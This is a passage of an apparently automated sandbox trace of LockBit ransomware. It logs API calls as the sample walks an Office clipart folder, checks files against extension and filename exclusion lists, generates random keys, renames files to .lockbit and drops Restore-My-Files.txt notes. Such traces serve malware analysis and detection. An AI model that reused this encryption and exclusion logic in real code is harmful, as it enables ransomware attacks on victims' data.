| out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.026] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.026] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.027] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.028] free (_Block=0x1fa2ed8) [0150.028] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.028] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.028] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x336a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188679.WMF", cAlternateFileName="")) returned 1 [0150.028] lstrcmpiW (lpString1=".", lpString2="J0188679.WMF") returned -1 [0150.028] lstrcmpiW (lpString1="..", lpString2="J0188679.WMF") returned -1 [0150.028] PathFindExtensionW (pszPath="J0188679.WMF") returned=".WMF" [0150.028] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.028] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.028] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.029] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.030] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.030] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.031] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.031] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.031] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.031] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.031] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.031] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188679.WMF") returned 1 [0150.031] lstrcmpiW (lpString1="ntldr", lpString2="J0188679.WMF") returned 1 [0150.031] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188679.WMF") returned 1 [0150.031] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188679.WMF") returned -1 [0150.031] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188679.WMF") returned -1 [0150.031] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188679.WMF") returned 1 [0150.031] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188679.WMF") returned -1 [0150.051] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.051] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF") returned=".WMF" [0150.051] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.051] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.051] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.052] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.052] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF.lockbit") returned 72 [0150.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188679.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.053] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.053] malloc (_Size=0x40068) returned 0x3df0008 [0150.053] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13162) returned 1 [0150.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.055] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.057] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.057] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.057] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.059] free (_Block=0x1fa2ed8) [0150.059] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188679.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.059] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.059] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ca4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195248.WMF", cAlternateFileName="")) returned 1 [0150.059] lstrcmpiW (lpString1=".", lpString2="J0195248.WMF") returned -1 [0150.059] lstrcmpiW (lpString1="..", lpString2="J0195248.WMF") returned -1 [0150.059] PathFindExtensionW (pszPath="J0195248.WMF") returned=".WMF" [0150.059] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.059] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.060] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.060] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.061] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195248.WMF") returned 1 [0150.061] lstrcmpiW (lpString1="ntldr", lpString2="J0195248.WMF") returned 1 [0150.061] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195248.WMF") returned 1 [0150.061] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195248.WMF") returned -1 [0150.061] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195248.WMF") returned -1 [0150.061] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195248.WMF") returned 1 [0150.061] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195248.WMF") returned -1 [0150.061] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.061] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF") returned=".WMF" [0150.061] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.062] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.062] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.063] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.063] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.067] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.067] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.067] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.067] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.067] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.067] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.067] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF.lockbit") returned 72 [0150.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195248.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.068] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.068] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.068] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7332) returned 1 [0150.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.070] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.074] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.074] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.074] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.075] free (_Block=0x1fa2ed8) [0150.075] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195248.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.075] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.075] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.076] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dcbf00, ftCreationTime.dwHighDateTime=0x1be2705, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81dcbf00, ftLastWriteTime.dwHighDateTime=0x1be2705, nFileSizeHigh=0x0, nFileSizeLow=0x11b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195254.WMF", cAlternateFileName="")) returned 1 [0150.076] lstrcmpiW (lpString1=".", lpString2="J0195254.WMF") returned -1 [0150.076] lstrcmpiW (lpString1="..", lpString2="J0195254.WMF") returned -1 [0150.076] PathFindExtensionW (pszPath="J0195254.WMF") returned=".WMF" [0150.076] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.076] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.077] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.077] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.078] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195254.WMF") returned 1 [0150.078] lstrcmpiW (lpString1="ntldr", lpString2="J0195254.WMF") returned 1 [0150.078] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195254.WMF") returned 1 [0150.078] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195254.WMF") returned -1 [0150.078] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195254.WMF") returned -1 [0150.078] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195254.WMF") returned 1 [0150.078] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195254.WMF") returned -1 [0150.078] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" 